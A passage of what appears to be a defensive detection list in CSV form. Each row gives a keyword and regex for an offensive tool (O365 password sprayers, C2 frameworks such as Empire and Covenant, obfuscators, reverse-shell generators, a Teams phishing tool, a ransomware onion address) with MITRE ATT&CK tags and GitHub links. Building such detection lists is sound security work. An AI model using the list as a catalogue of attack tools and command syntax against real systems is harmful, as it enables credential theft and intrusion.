"*o365creeper.py*",".{0,1000}o365creeper\.py.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","53794"
"*o365creeper-master*",".{0,1000}o365creeper\-master.{0,1000}","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Discovery","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","N/A","4","342","60","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z","53795"
"*o365enum.py*",".{0,1000}o365enum\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","53796"
"*o365enum.py*",".{0,1000}o365enum\.py.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","1","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","53797"
"*o365enum-master*",".{0,1000}o365enum\-master.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","1","N/A","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","53798"
"*o365recon.ps1*",".{0,1000}o365recon\.ps1.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","53799"
"*o365recon-master*",".{0,1000}o365recon\-master.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","53800"
"*o365spray --enum *",".{0,1000}o365spray\s\-\-enum\s.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53801"
"*o365spray --spray *",".{0,1000}o365spray\s\-\-spray\s.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53802"
"*o365spray --validate*",".{0,1000}o365spray\s\-\-validate.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53803"
"*o365spray.core.handlers.sprayer*",".{0,1000}o365spray\.core\.handlers\.sprayer.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","53804"
"*o6pi3u67zyag73ligtsupin5rjkxpfrbofwoxnhimpgpfttxqu7lsuyd.onion*",".{0,1000}o6pi3u67zyag73ligtsupin5rjkxpfrbofwoxnhimpgpfttxqu7lsuyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53805"
"*oab-parse.py*",".{0,1000}oab\-parse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","53806"
"*oaburl.py */*:*@* -e *",".{0,1000}oaburl\.py\s.{0,1000}\/.{0,1000}\:.{0,1000}\@.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53807"
"*'Obfu'+'scation Ro'+'cks!'*",".{0,1000}\'Obfu\'\+\'scation\sRo\'\+\'cks!\'.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#content","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","53808"
"*obfuscate.py grunt*",".{0,1000}obfuscate\.py\sgrunt.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","53809"
"*Obfuscate.py*",".{0,1000}Obfuscate\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","53810"
"*obfuscate/shellter*",".{0,1000}obfuscate\/shellter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","53811"
"*obfuscate_cmdlet*",".{0,1000}obfuscate_cmdlet.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","53812"
"*obfuscate_command*",".{0,1000}obfuscate_command.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","53813"
"*obfuscated_module_source/*",".{0,1000}obfuscated_module_source\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53814"
"*obfuscation.exe --*",".{0,1000}obfuscation\.exe\s\-\-.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","53815"
"*obfuscation.exe -f * -t *",".{0,1000}obfuscation\.exe\s\-f\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","53816"
"*obfuscator*antidisassembly.*",".{0,1000}obfuscator.{0,1000}antidisassembly\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","53817"
"*obfuscator.cpp*",".{0,1000}obfuscator\.cpp.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","53818"
"*obfuskittiedump*",".{0,1000}obfuskittiedump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","53819"
"*ObjectQuery(""SELECT * FROM MSFT_MpPreference"")*",".{0,1000}ObjectQuery\(\""SELECT\s.{0,1000}\sFROM\sMSFT_MpPreference\""\).{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","53820"
"*objects_constrained_delegation_full.txt*",".{0,1000}objects_constrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","53822"
"*objects_rbcd_delegation_full.txt*",".{0,1000}objects_rbcd_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","53823"
"*objects_unconstrained_delegation_full.txt*",".{0,1000}objects_unconstrained_delegation_full\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","53824"
"*objexec *.o*",".{0,1000}objexec\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53825"
"*objShell.Run ""calc.exe""*",".{0,1000}objShell\.Run\s\""calc\.exe\"".{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#content","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","53826"
"*obscuritylabs/ase:latest*",".{0,1000}obscuritylabs\/ase\:latest.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","53827"
"*obscuritylabs/RAI/*",".{0,1000}obscuritylabs\/RAI\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","53828"
"*octetsplicer/LAZYPARIAH*",".{0,1000}octetsplicer\/LAZYPARIAH.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","53830"
"*Octoberfest7/JumpSession_BOF*",".{0,1000}Octoberfest7\/JumpSession_BOF.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","53831"
"*Octoberfest7/KDStab*",".{0,1000}Octoberfest7\/KDStab.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","53832"
"*Octoberfest7/TeamsPhisher*",".{0,1000}Octoberfest7\/TeamsPhisher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","53833"
"*octopus.py *",".{0,1000}octopus\.py\s.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","53834"
"*OEP_Hiijack_Inject_Load*",".{0,1000}OEP_Hiijack_Inject_Load.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","53835"
"*offensive_notion.exe*",".{0,1000}offensive_notion\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53836"
"*offensive_notion_darwin_*",".{0,1000}offensive_notion_darwin_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","#linux","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53837"
"*offensive_notion_linux_*",".{0,1000}offensive_notion_linux_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","#linux","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53838"
"*offensive_notion_win_*.exe*",".{0,1000}offensive_notion_win_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","53839"
"*OffensiveCSharp*DriverQuery*",".{0,1000}OffensiveCSharp.{0,1000}DriverQuery.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","53840"
